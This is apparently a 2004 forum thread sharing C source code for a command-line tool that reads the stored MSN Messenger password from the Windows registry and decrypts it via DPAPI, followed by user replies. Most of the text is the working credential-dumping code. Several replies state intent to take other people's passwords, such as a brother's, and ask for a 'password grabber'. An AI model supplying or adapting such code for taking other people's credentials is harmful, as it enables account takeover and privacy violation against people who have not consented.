Hi all

The attached tool allows you to decrypt the MSN Messenger password stored
in your computer password. The tool cannot be used on password stored on
other computers, as the decryption algorithms relies on the computer's
internal certificate for decryption.

enjoy and be cerfull


****************************************************************

/* MSNMessenger DPAPI
*
* tombkeeper[0x40]nsfocus[0x2e]com
* tombkeeper[0x40]xfocus[0x2e]net
* 2004.08.11
*/

#include <Windows.h>


#pragma comment(lib, "Advapi32.lib")

#define FCHK(a) if (!(a)) {printf(#a " failed\n"); return 0;}

typedef struct _CRYPTOAPI_BLOB {
DWORD cbData;
BYTE* pbData;
} DATA_BLOB;

typedef struct _CRYPTPROTECT_PROMPTSTRUCT {
DWORD cbSize;
DWORD dwPromptFlags;
HWND hwndApp;
LPCWSTR szPrompt;
} CRYPTPROTECT_PROMPTSTRUCT, *PCRYPTPROTECT_PROMPTSTRUCT;

typedef BOOL (WINAPI *PCryptUnprotectData)(
DATA_BLOB* pDataIn,
LPWSTR* ppszDataDescr,
DATA_BLOB* pOptionalEntropy,
PVOID pvReserved,
CRYPTPROTECT_PROMPTSTRUCT* pPromptStruct,
DWORD dwFlags,
DATA_BLOB* pDataOut
);

PCryptUnprotectData CryptUnprotectData = NULL;


int main(void)
{
int ret;
HMODULE hNtdll;

HKEY hKey;
DWORD dwType;
char Data[0x100] = {0};
DWORD dwSize;

DATA_BLOB DataIn;
DATA_BLOB DataOut;

ret = RegOpenKeyEx
(
HKEY_CURRENT_USER,
"Software\\Microsoft\\MSNMessenger",
0,
KEY_READ,
&hKey
);
if( ret != ERROR_SUCCESS ) return 1;

ret = RegQueryValueEx
(
hKey,
"Password.NET Messenger Service",
NULL,
&dwType,
Data,
&dwSize
);
if( ret != ERROR_SUCCESS ) return 1;

FCHK ((hNtdll = LoadLibrary ("Crypt32.dll")) != NULL);
FCHK ((CryptUnprotectData = (PCryptUnprotectData)
GetProcAddress (hNtdll, "CryptUnprotectData")) != NULL);

DataIn.pbData = Data + 2; //
DataIn.cbData = dwSize-2;

CryptUnprotectData
(
&DataIn,
NULL,
NULL,
NULL,
NULL,
1,
&DataOut
);

base64_decode (DataOut.pbData, Data, strlen(DataOut.pbData));
printf ( "MSN Password: %s\n", Data);
return 0;
}

//copied from GNU libc - libc/resolv/base64.c
int base64_decode (char const *src, char *target, size_t targsize)
{
static const char Base64[] =

"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static const char Pad64 = '=';

int tarindex, state, ch;
char *pos;

state = 0;
tarindex = 0;

while ((ch = *src++) != '\0')
{
if (isspace (ch)) /* Skip whitespace anywhere. */
continue;

if (ch == Pad64)
break;

pos = strchr (Base64, ch);
if (pos == 0) /* A non-base64 character. */
return (-1);

switch (state)
{
case 0:
if (target)
{
if ((size_t) tarindex >= targsize)
return (-1);
target[tarindex] = (pos - Base64) << 2;
}
state = 1;
break;
case 1:
if (target)
{
if ((size_t) tarindex + 1 >= targsize)
return (-1);
target[tarindex] |= (pos - Base64) >> 4;
target[tarindex + 1] = ((pos - Base64) & 0x0f) << 4;
}
tarindex++;
state = 2;
break;
case 2:
if (target)
{
if ((size_t) tarindex + 1 >= targsize)
return (-1);
target[tarindex] |= (pos - Base64) >> 2;
target[tarindex + 1] = ((pos - Base64) & 0x03) << 6;
}
tarindex++;
state = 3;
break;
case 3:
if (target)
{
if ((size_t) tarindex >= targsize)
return (-1);
target[tarindex] |= (pos - Base64);
}
tarindex++;
state = 0;
break;
default:
abort ();
}
}

/*
* We are done decoding Base-64 chars. Let's see if we ended
* on a byte boundary, and/or with erroneous trailing characters.
*/

if (ch == Pad64)
{ /* We got a pad char. */
ch = *src++; /* Skip it, get next. */
switch (state)
{
case 0: /* Invalid = in first position */
case 1: /* Invalid = in second position */
return (-1);

case 2: /* Valid, means one byte of info */
/* Skip any number of spaces. */
for ((void) NULL; ch != '\0'; ch = *src++)
if (!isspace (ch))
break;
/* Make sure there is another trailing = sign. */
if (ch != Pad64)
return (-1);
ch = *src++; /* Skip the = */
/* Fall through to "single trailing =" case. */
/* FALLTHROUGH */

case 3: /* Valid, means two bytes of info */
/*
* We know this char is an =. Is there anything but
* whitespace after it?
*/
for ((void) NULL; ch != '\0'; ch = *src++)
if (!isspace (ch))
return (-1);

/*
* Now make sure for cases 2 and 3 that the "extra"
* bits that slopped past the last full byte were
* zeros. If we don't check them, they become a
* subliminal channel.
*/
if (target && target[tarindex] != 0)
return (-1);
}
}
else
{
/*
* We ended by seeing the end of the string. Make sure we
* have no partial bytes lying around.
*/
if (state != 0)
return (-1);
}

return (tarindex);
}

hehe *lol* funny catched my password

compiled version attached

it doesn't do anything at my pc
does it work with msn 6.2 too?
i can't find the registry value (manually) where the program looks for
and i know that i got my pass stored on my pc

Lol, ill try to get my brother's password:p

hmm used the compiled one and compiled it myself.. both result is .. output is nothing..
Maybe I am doing something weird.. there is an cached password on this PC.. I know =)
My brother got his.. and I already know his pass... so just want to test it out

Serhat

mmm, it doesn't work for me

looks good, not at a computer with MSN ATM but will try it later

for those who want to retreive your MSN password and others use the nirsoft tool at
hxxp://freehost14.websamba.com/nirsoft/utils/mspass.html
tested it against MSN 6.2 and got a password

thx for this link @ nuorder


gr€€tz fL4Shb4Ck

It didn't work here..maybe because i still got 6.1
..

this program is referring to the key"Password.NET Messenger Service" under HKEY_CURRENT_USER\Software\Microsoft\MSNMessenger
i cant see this key in the registry so im guessing that either windows hides this key and the nirsoft tool has a workaround or it really isnt there and it is accessed by other means
regmon shows the nirsoft tool is trying to access it but fails, didnt test it with the program in this thread because it doesnt work anyway.

if the decryption method is the same just gotta find the right regkey now i guess or a way to access "Password.NET Messenger Service" if it really is there. i think old versions you could see it

and probably the reason why it exits and displays nothing is that this segment of code

it works on 6.2 tested

is there possible to get other users password ?

Very nice work, I must get learning the windows.h header use; thx for the tool

tested here and works 100% even with msn 6.2 translated

doesnt work here i need this tool working right now

its very important to me also nirsoft tool is working i c my pass but its GUI i need a working command line msn password grabber guys !!!

rlzs! it works with version 6.2

guys who have sp2 xp did this cmd line prog work ?

and guys who had it worked with them do u have winxp not sp2

i wanna know to see why it doesnt work :S